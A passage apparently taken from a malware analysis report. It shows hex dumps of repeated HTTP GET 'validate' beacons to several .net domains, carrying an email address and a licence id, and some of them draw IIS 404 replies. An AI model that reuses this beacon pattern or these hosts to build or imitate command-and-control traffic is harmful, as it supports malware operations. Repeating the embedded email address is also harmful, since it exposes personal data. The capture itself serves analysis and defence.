0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a206d69 6c6b6669 73682e6e 65740d0a   : milkfish.net..
0x000000a0 (00160)   0d0a0d0a 204e6f74                     .... Not

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a207769 74687769 6e672e6e 65740d0a   : withwing.net..
0x000000a0 (00160)   0d0a0d0a 204e6f74                     .... Not

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a207369 67687466 6973682e 6e65740d   : sightfish.net.
0x000000a0 (00160)   0a0d0a34 204e6f74 20466f75 6e643c2f   ...4 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a206865 61647769 6e672e6e 65740d0a   : headwing.net..
0x000000a0 (00160)   0d0a3034 204e6f74 20466f75 6e643c2f   ..04 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings